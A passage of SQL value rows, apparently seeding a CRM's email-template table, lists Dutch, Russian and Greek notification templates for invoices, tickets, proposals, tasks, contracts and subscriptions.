(397, 'invoice', 'invoice-send-to-client', 'dutch', 'Send Invoice to Customer [dutch]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(398, 'ticket', 'new-ticket-opened-admin', 'dutch', 'New Ticket Opened (Opened by Staff, Sent to Customer) [dutch]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(399, 'ticket', 'ticket-reply', 'dutch', 'Ticket Reply (Sent to Customer) [dutch]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(400, 'ticket', 'ticket-autoresponse', 'dutch', 'New Ticket Opened - Autoresponse [dutch]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(401, 'invoice', 'invoice-payment-recorded', 'dutch', 'Invoice Payment Recorded (Sent to Customer) [dutch]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(402, 'invoice', 'invoice-overdue-notice', 'dutch', 'Invoice Overdue Notice [dutch]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(403, 'invoice', 'invoice-already-send', 'dutch', 'Invoice Already Sent to Customer [dutch]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(404, 'ticket', 'new-ticket-created-staff', 'dutch', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [dutch]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(405, 'estimate', 'estimate-send-to-client', 'dutch', 'Send Estimate to Customer [dutch]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(406, 'ticket', 'ticket-reply-to-admin', 'dutch', 'Ticket Reply (Sent to Staff) [dutch]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(407, 'estimate', 'estimate-already-send', 'dutch', 'Estimate Already Sent to Customer [dutch]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(408, 'contract', 'contract-expiration', 'dutch', 'Contract Expiration Reminder (Sent to Customer Contacts) [dutch]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(409, 'tasks', 'task-assigned', 'dutch', 'New Task Assigned (Sent to Staff) [dutch]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(410, 'tasks', 'task-added-as-follower', 'dutch', 'Staff Member Added as Follower on Task (Sent to Staff) [dutch]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(411, 'tasks', 'task-commented', 'dutch', 'New Comment on Task (Sent to Staff) [dutch]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(412, 'tasks', 'task-added-attachment', 'dutch', 'New Attachment(s) on Task (Sent to Staff) [dutch]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(413, 'estimate', 'estimate-declined-to-staff', 'dutch', 'Estimate Declined (Sent to Staff) [dutch]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(414, 'estimate', 'estimate-accepted-to-staff', 'dutch', 'Estimate Accepted (Sent to Staff) [dutch]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(415, 'proposals', 'proposal-client-accepted', 'dutch', 'Customer Action - Accepted (Sent to Staff) [dutch]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(416, 'proposals', 'proposal-send-to-customer', 'dutch', 'Send Proposal to Customer [dutch]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(417, 'proposals', 'proposal-client-declined', 'dutch', 'Customer Action - Declined (Sent to Staff) [dutch]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(418, 'proposals', 'proposal-client-thank-you', 'dutch', 'Thank You Email (Sent to Customer After Accept) [dutch]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(419, 'proposals', 'proposal-comment-to-client', 'dutch', 'New Comment  (Sent to Customer/Lead) [dutch]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(420, 'proposals', 'proposal-comment-to-admin', 'dutch', 'New Comment (Sent to Staff)  [dutch]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(421, 'estimate', 'estimate-thank-you-to-customer', 'dutch', 'Thank You Email (Sent to Customer After Accept) [dutch]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(422, 'tasks', 'task-deadline-notification', 'dutch', 'Task Deadline Reminder - Sent to Assigned Members [dutch]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(423, 'contract', 'send-contract', 'dutch', 'Send Contract to Customer [dutch]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(424, 'invoice', 'invoice-payment-recorded-to-staff', 'dutch', 'Invoice Payment Recorded (Sent to Staff) [dutch]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(425, 'ticket', 'auto-close-ticket', 'dutch', 'Auto Close Ticket [dutch]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(426, 'project', 'new-project-discussion-created-to-staff', 'dutch', 'New Project Discussion (Sent to Project Members) [dutch]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(427, 'project', 'new-project-discussion-created-to-customer', 'dutch', 'New Project Discussion (Sent to Customer Contacts) [dutch]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(428, 'project', 'new-project-file-uploaded-to-customer', 'dutch', 'New Project File(s) Uploaded (Sent to Customer Contacts) [dutch]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(429, 'project', 'new-project-file-uploaded-to-staff', 'dutch', 'New Project File(s) Uploaded (Sent to Project Members) [dutch]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(430, 'project', 'new-project-discussion-comment-to-customer', 'dutch', 'New Discussion Comment  (Sent to Customer Contacts) [dutch]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(431, 'project', 'new-project-discussion-comment-to-staff', 'dutch', 'New Discussion Comment (Sent to Project Members) [dutch]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(432, 'project', 'staff-added-as-project-member', 'dutch', 'Staff Added as Project Member [dutch]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(433, 'estimate', 'estimate-expiry-reminder', 'dutch', 'Estimate Expiration Reminder [dutch]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(434, 'proposals', 'proposal-expiry-reminder', 'dutch', 'Proposal Expiration Reminder [dutch]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(435, 'staff', 'new-staff-created', 'dutch', 'New Staff Created (Welcome Email) [dutch]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(436, 'client', 'contact-forgot-password', 'dutch', 'Forgot Password [dutch]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(437, 'client', 'contact-password-reseted', 'dutch', 'Password Reset - Confirmation [dutch]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(438, 'client', 'contact-set-password', 'dutch', 'Set New Password [dutch]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(439, 'staff', 'staff-forgot-password', 'dutch', 'Forgot Password [dutch]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(440, 'staff', 'staff-password-reseted', 'dutch', 'Password Reset - Confirmation [dutch]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(441, 'project', 'assigned-to-project', 'dutch', 'New Project Created (Sent to Customer Contacts) [dutch]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(442, 'tasks', 'task-added-attachment-to-contacts', 'dutch', 'New Attachment(s) on Task (Sent to Customer Contacts) [dutch]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(443, 'tasks', 'task-commented-to-contacts', 'dutch', 'New Comment on Task (Sent to Customer Contacts) [dutch]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(444, 'leads', 'new-lead-assigned', 'dutch', 'New Lead Assigned to Staff Member [dutch]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(445, 'client', 'client-statement', 'dutch', 'Statement - Account Summary [dutch]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(446, 'ticket', 'ticket-assigned-to-admin', 'dutch', 'New Ticket Assigned (Sent to Staff) [dutch]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(447, 'client', 'new-client-registered-to-admin', 'dutch', 'New Customer Registration (Sent to admins) [dutch]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(448, 'leads', 'new-web-to-lead-form-submitted', 'dutch', 'Web to lead form submitted - Sent to lead [dutch]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(449, 'staff', 'two-factor-authentication', 'dutch', 'Two Factor Authentication [dutch]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(450, 'project', 'project-finished-to-customer', 'dutch', 'Project Marked as Finished (Sent to Customer Contacts) [dutch]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(451, 'credit_note', 'credit-note-send-to-client', 'dutch', 'Send Credit Note To Email [dutch]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(452, 'tasks', 'task-status-change-to-staff', 'dutch', 'Task Status Changed (Sent to Staff) [dutch]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(453, 'tasks', 'task-status-change-to-contacts', 'dutch', 'Task Status Changed (Sent to Customer Contacts) [dutch]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(454, 'staff', 'reminder-email-staff', 'dutch', 'Staff Reminder Email [dutch]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(455, 'contract', 'contract-comment-to-client', 'dutch', 'New Comment  (Sent to Customer Contacts) [dutch]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(456, 'contract', 'contract-comment-to-admin', 'dutch', 'New Comment (Sent to Staff)  [dutch]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(457, 'subscriptions', 'send-subscription', 'dutch', 'Send Subscription to Customer [dutch]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(458, 'subscriptions', 'subscription-payment-failed', 'dutch', 'Subscription Payment Failed [dutch]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(459, 'subscriptions', 'subscription-canceled', 'dutch', 'Subscription Canceled (Sent to customer primary contact) [dutch]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(460, 'subscriptions', 'subscription-payment-succeeded', 'dutch', 'Subscription Payment Succeeded (Sent to customer primary contact) [dutch]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(461, 'contract', 'contract-expiration-to-staff', 'dutch', 'Contract Expiration Reminder (Sent to Staff) [dutch]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(462, 'gdpr', 'gdpr-removal-request', 'dutch', 'Removal Request From Contact (Sent to administrators) [dutch]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(463, 'gdpr', 'gdpr-removal-request-lead', 'dutch', 'Removal Request From Lead (Sent to administrators) [dutch]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(464, 'client', 'client-registration-confirmed', 'dutch', 'Customer Registration Confirmed [dutch]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(465, 'contract', 'contract-signed-to-staff', 'dutch', 'Contract Signed (Sent to Staff) [dutch]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(466, 'subscriptions', 'customer-subscribed-to-staff', 'dutch', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [dutch]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(467, 'client', 'contact-verification-email', 'dutch', 'Email Verification (Sent to Contact After Registration) [dutch]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(468, 'client', 'new-customer-profile-file-uploaded-to-staff', 'dutch', 'New Customer Profile File(s) Uploaded (Sent to Staff) [dutch]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(469, 'staff', 'event-notification-to-staff', 'dutch', 'Event Notification (Calendar) [dutch]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(470, 'subscriptions', 'subscription-payment-requires-action', 'dutch', 'Credit Card Authorization Required - SCA [dutch]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(471, 'invoice', 'invoice-due-notice', 'dutch', 'Invoice Due Notice [dutch]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(472, 'estimate_request', 'estimate-request-submitted-to-staff', 'dutch', 'Estimate Request Submitted (Sent to Staff) [dutch]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(473, 'estimate_request', 'estimate-request-assigned', 'dutch', 'Estimate Request Assigned (Sent to Staff) [dutch]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(474, 'estimate_request', 'estimate-request-received-to-user', 'dutch', 'Estimate Request Received (Sent to User) [dutch]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(475, 'client', 'new-client-created', 'russian', 'New Contact Added/Registered (Welcome Email) [russian]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(476, 'invoice', 'invoice-send-to-client', 'russian', 'Send Invoice to Customer [russian]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(477, 'ticket', 'new-ticket-opened-admin', 'russian', 'New Ticket Opened (Opened by Staff, Sent to Customer) [russian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(478, 'ticket', 'ticket-reply', 'russian', 'Ticket Reply (Sent to Customer) [russian]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(479, 'ticket', 'ticket-autoresponse', 'russian', 'New Ticket Opened - Autoresponse [russian]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(480, 'invoice', 'invoice-payment-recorded', 'russian', 'Invoice Payment Recorded (Sent to Customer) [russian]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(481, 'invoice', 'invoice-overdue-notice', 'russian', 'Invoice Overdue Notice [russian]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(482, 'invoice', 'invoice-already-send', 'russian', 'Invoice Already Sent to Customer [russian]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(483, 'ticket', 'new-ticket-created-staff', 'russian', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [russian]', 'New Ticket Created', '', '{companyname} | CRM', '', 0, 1, 0),
(484, 'estimate', 'estimate-send-to-client', 'russian', 'Send Estimate to Customer [russian]', 'Estimate # {estimate_number} created', '', '{companyname} |  yêu cầu', '', 0, 0, 0),
(485, 'ticket', 'ticket-reply-to-admin', 'russian', 'Ticket Reply (Sent to Staff) [russian]', 'New Support Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(486, 'estimate', 'estimate-already-send', 'russian', 'Estimate Already Sent to Customer [russian]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', '', 0, 0, 0),
(487, 'contract', 'contract-expiration', 'russian', 'Contract Expiration Reminder (Sent to Customer Contacts) [russian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(488, 'tasks', 'task-assigned', 'russian', 'New Task Assigned (Sent to Staff) [russian]', 'New Task Assigned to You - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(489, 'tasks', 'task-added-as-follower', 'russian', 'Staff Member Added as Follower on Task (Sent to Staff) [russian]', 'You are added as follower on task - {task_name}', '', '{companyname} | CRM', '', 0, 1, 0),
(490, 'tasks', 'task-commented', 'russian', 'New Comment on Task (Sent to Staff) [russian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(491, 'tasks', 'task-added-attachment', 'russian', 'New Attachment(s) on Task (Sent to Staff) [russian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(492, 'estimate', 'estimate-declined-to-staff', 'russian', 'Estimate Declined (Sent to Staff) [russian]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(493, 'estimate', 'estimate-accepted-to-staff', 'russian', 'Estimate Accepted (Sent to Staff) [russian]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(494, 'proposals', 'proposal-client-accepted', 'russian', 'Customer Action - Accepted (Sent to Staff) [russian]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(495, 'proposals', 'proposal-send-to-customer', 'russian', 'Send Proposal to Customer [russian]', 'Proposal With Number {proposal_number} Created', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(496, 'proposals', 'proposal-client-declined', 'russian', 'Customer Action - Declined (Sent to Staff) [russian]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(497, 'proposals', 'proposal-client-thank-you', 'russian', 'Thank You Email (Sent to Customer After Accept) [russian]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(498, 'proposals', 'proposal-comment-to-client', 'russian', 'New Comment  (Sent to Customer/Lead) [russian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(499, 'proposals', 'proposal-comment-to-admin', 'russian', 'New Comment (Sent to Staff)  [russian]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(500, 'estimate', 'estimate-thank-you-to-customer', 'russian', 'Thank You Email (Sent to Customer After Accept) [russian]', 'Thank for you accepting estimate', '', '{companyname} | CRM', '', 0, 1, 0),
(501, 'tasks', 'task-deadline-notification', 'russian', 'Task Deadline Reminder - Sent to Assigned Members [russian]', 'Task Deadline Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(502, 'contract', 'send-contract', 'russian', 'Send Contract to Customer [russian]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(503, 'invoice', 'invoice-payment-recorded-to-staff', 'russian', 'Invoice Payment Recorded (Sent to Staff) [russian]', 'New Invoice Payment', '', '{companyname} | CRM', '', 0, 1, 0),
(504, 'ticket', 'auto-close-ticket', 'russian', 'Auto Close Ticket [russian]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(505, 'project', 'new-project-discussion-created-to-staff', 'russian', 'New Project Discussion (Sent to Project Members) [russian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(506, 'project', 'new-project-discussion-created-to-customer', 'russian', 'New Project Discussion (Sent to Customer Contacts) [russian]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(507, 'project', 'new-project-file-uploaded-to-customer', 'russian', 'New Project File(s) Uploaded (Sent to Customer Contacts) [russian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(508, 'project', 'new-project-file-uploaded-to-staff', 'russian', 'New Project File(s) Uploaded (Sent to Project Members) [russian]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(509, 'project', 'new-project-discussion-comment-to-customer', 'russian', 'New Discussion Comment  (Sent to Customer Contacts) [russian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(510, 'project', 'new-project-discussion-comment-to-staff', 'russian', 'New Discussion Comment (Sent to Project Members) [russian]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(511, 'project', 'staff-added-as-project-member', 'russian', 'Staff Added as Project Member [russian]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(512, 'estimate', 'estimate-expiry-reminder', 'russian', 'Estimate Expiration Reminder [russian]', 'Estimate Expiration Reminder', '', '{companyname} | CRM', '', 0, 1, 0),
(513, 'proposals', 'proposal-expiry-reminder', 'russian', 'Proposal Expiration Reminder [russian]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(514, 'staff', 'new-staff-created', 'russian', 'New Staff Created (Welcome Email) [russian]', 'You are added as staff member', '', '{companyname} | CRM', '', 0, 0, 0),
(515, 'client', 'contact-forgot-password', 'russian', 'Forgot Password [russian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(516, 'client', 'contact-password-reseted', 'russian', 'Password Reset - Confirmation [russian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(517, 'client', 'contact-set-password', 'russian', 'Set New Password [russian]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(518, 'staff', 'staff-forgot-password', 'russian', 'Forgot Password [russian]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(519, 'staff', 'staff-password-reseted', 'russian', 'Password Reset - Confirmation [russian]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(520, 'project', 'assigned-to-project', 'russian', 'New Project Created (Sent to Customer Contacts) [russian]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(521, 'tasks', 'task-added-attachment-to-contacts', 'russian', 'New Attachment(s) on Task (Sent to Customer Contacts) [russian]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(522, 'tasks', 'task-commented-to-contacts', 'russian', 'New Comment on Task (Sent to Customer Contacts) [russian]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(523, 'leads', 'new-lead-assigned', 'russian', 'New Lead Assigned to Staff Member [russian]', 'New lead assigned to you', '', '{companyname} | CRM', '', 0, 0, 0),
(524, 'client', 'client-statement', 'russian', 'Statement - Account Summary [russian]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', '', 0, 0, 0),
(525, 'ticket', 'ticket-assigned-to-admin', 'russian', 'New Ticket Assigned (Sent to Staff) [russian]', 'New support ticket has been assigned to you', '', '{companyname} | CRM', '', 0, 1, 0),
(526, 'client', 'new-client-registered-to-admin', 'russian', 'New Customer Registration (Sent to admins) [russian]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(527, 'leads', 'new-web-to-lead-form-submitted', 'russian', 'Web to lead form submitted - Sent to lead [russian]', '{lead_name} - We Received Your Request', '', '{companyname} | Tổ chức đào tạo WIT', '', 0, 0, 0),
(528, 'staff', 'two-factor-authentication', 'russian', 'Two Factor Authentication [russian]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(529, 'project', 'project-finished-to-customer', 'russian', 'Project Marked as Finished (Sent to Customer Contacts) [russian]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(530, 'credit_note', 'credit-note-send-to-client', 'russian', 'Send Credit Note To Email [russian]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(531, 'tasks', 'task-status-change-to-staff', 'russian', 'Task Status Changed (Sent to Staff) [russian]', 'Task Status Changed', '', '{companyname} | CRM', '', 0, 1, 0),
(532, 'tasks', 'task-status-change-to-contacts', 'russian', 'Task Status Changed (Sent to Customer Contacts) [russian]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(533, 'staff', 'reminder-email-staff', 'russian', 'Staff Reminder Email [russian]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(534, 'contract', 'contract-comment-to-client', 'russian', 'New Comment  (Sent to Customer Contacts) [russian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(535, 'contract', 'contract-comment-to-admin', 'russian', 'New Comment (Sent to Staff)  [russian]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(536, 'subscriptions', 'send-subscription', 'russian', 'Send Subscription to Customer [russian]', 'Subscription Created', '', '{companyname} | CRM', '', 1, 0, 0),
(537, 'subscriptions', 'subscription-payment-failed', 'russian', 'Subscription Payment Failed [russian]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(538, 'subscriptions', 'subscription-canceled', 'russian', 'Subscription Canceled (Sent to customer primary contact) [russian]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(539, 'subscriptions', 'subscription-payment-succeeded', 'russian', 'Subscription Payment Succeeded (Sent to customer primary contact) [russian]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(540, 'contract', 'contract-expiration-to-staff', 'russian', 'Contract Expiration Reminder (Sent to Staff) [russian]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(541, 'gdpr', 'gdpr-removal-request', 'russian', 'Removal Request From Contact (Sent to administrators) [russian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(542, 'gdpr', 'gdpr-removal-request-lead', 'russian', 'Removal Request From Lead (Sent to administrators) [russian]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(543, 'client', 'client-registration-confirmed', 'russian', 'Customer Registration Confirmed [russian]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(544, 'contract', 'contract-signed-to-staff', 'russian', 'Contract Signed (Sent to Staff) [russian]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(545, 'subscriptions', 'customer-subscribed-to-staff', 'russian', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [russian]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(546, 'client', 'contact-verification-email', 'russian', 'Email Verification (Sent to Contact After Registration) [russian]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(547, 'client', 'new-customer-profile-file-uploaded-to-staff', 'russian', 'New Customer Profile File(s) Uploaded (Sent to Staff) [russian]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(548, 'staff', 'event-notification-to-staff', 'russian', 'Event Notification (Calendar) [russian]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(549, 'subscriptions', 'subscription-payment-requires-action', 'russian', 'Credit Card Authorization Required - SCA [russian]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(550, 'invoice', 'invoice-due-notice', 'russian', 'Invoice Due Notice [russian]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(551, 'estimate_request', 'estimate-request-submitted-to-staff', 'russian', 'Estimate Request Submitted (Sent to Staff) [russian]', 'New Estimate Request Submitted', '', '{companyname} | CRM Tổ chức đào tạo WIT', '', 0, 1, 0),
(552, 'estimate_request', 'estimate-request-assigned', 'russian', 'Estimate Request Assigned (Sent to Staff) [russian]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(553, 'estimate_request', 'estimate-request-received-to-user', 'russian', 'Estimate Request Received (Sent to User) [russian]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(554, 'client', 'new-client-created', 'greek', 'New Contact Added/Registered (Welcome Email) [greek]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(555, 'invoice', 'invoice-send-to-client', 'greek', 'Send Invoice to Customer [greek]', 'Invoice with number {invoice_number} created', '', '{companyname} | CRM', '', 0, 0, 0),
(556, 'ticket', 'new-ticket-opened-admin', 'greek', 'New Ticket Opened (Opened by Staff, Sent to Customer) [greek]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(557, 'ticket', 'ticket-reply', 'greek', 'Ticket Reply (Sent to Customer) [greek]', 'New Ticket Reply', '', '{companyname} | CRM', '', 0, 1, 0),
(558, 'ticket', 'ticket-autoresponse', 'greek', 'New Ticket Opened - Autoresponse [greek]', 'New Support Ticket Opened', '', '{companyname} | CRM', '', 0, 1, 0),
(559, 'invoice', 'invoice-payment-recorded', 'greek', 'Invoice Payment Recorded (Sent to Customer) [greek]', 'Invoice Payment Recorded', '', '{companyname} | CRM', '', 0, 1, 0),
(560, 'invoice', 'invoice-overdue-notice', 'greek', 'Invoice Overdue Notice [greek]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
